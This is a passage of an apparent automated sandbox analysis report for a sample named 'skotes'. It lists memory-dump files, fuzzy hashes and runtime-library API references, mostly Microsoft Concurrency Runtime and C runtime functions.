                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                                                • API String ID: 3897347962-3650809737
                                                                                                                                                                                                                                                                • Opcode ID: 36ae2239ab5e0080ed67003ed494a34684ef953fee9baff0d54ecae72b139495
                                                                                                                                                                                                                                                                • Instruction ID: ff7891ec5a0aa797f7f214088bc529bb96976eec45fb8def8524117e2b1aa706
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36ae2239ab5e0080ed67003ed494a34684ef953fee9baff0d54ecae72b139495
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3212F34A00249EFCB14EFA9CA95EADBBB9BF45350F15406DE905AB351DB30AE01DF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00AC7903
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC5CB8: __EH_prolog3_catch.LIBCMT ref: 00AC5CBF
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC5CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00AC5CF8
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00AC792A
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00AC7936
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC5CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00AC5D70
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC5CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00AC5D7E
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00AC7982
                                                                                                                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 00AC79A3
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00AC79AB
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00AC79BD
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00AC79ED
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00AC6942
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00AC6965
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1475861073-0
                                                                                                                                                                                                                                                                • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                                                • Instruction ID: ee514bf9f7b88e8c76952b07d42088698219c6e260e965028af7e0724030d190
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A314530B08251AECF96AB784892FFEBBB5AF41300F0641ADD496D7242DB345D4ACBD1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00AD4877
                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00AD487F
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00AD4908
                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00AD4933
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00AD4988
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                • Opcode ID: 5654779878c9a0b7175cd00533cefe6eb5821aa2abde6aa5ff243a79abf69aac
                                                                                                                                                                                                                                                                • Instruction ID: 9fac1e98a3c0f69598e6208ff89dad5a9011cc865060840eff05256580a5e328
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5654779878c9a0b7175cd00533cefe6eb5821aa2abde6aa5ff243a79abf69aac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3741D434E00248AFCF10DF69C884A9EBFB5FF49314F148156E81AAB3A2D731DA15CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00ACDD91
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00ACDDAE
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00ACDE14
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00ACDE29
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00ACDE3B
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 00ACDE4B
                                                                                                                                                                                                                                                                • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00ACDE74
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2885714658-0
                                                                                                                                                                                                                                                                • Opcode ID: 61bad235c11931f8f08c5529d3253959c5d7ac9aff401427184e8944272f57a7
                                                                                                                                                                                                                                                                • Instruction ID: 2586a37acd75f936ddd2d4aacea61c2e04ce68e3f610f05e27cbb45f2201ec06
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61bad235c11931f8f08c5529d3253959c5d7ac9aff401427184e8944272f57a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2841B930A042489ADF15EBB08656FED7BA56F11304F0A44BDE8526F2C3DB348E09CB62
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00ACE7D7
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00ACE577
                                                                                                                                                                                                                                                                  • Part of subcall function 00ACE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00ACE599
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00ACE854
                                                                                                                                                                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00ACE860
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00ACE86F
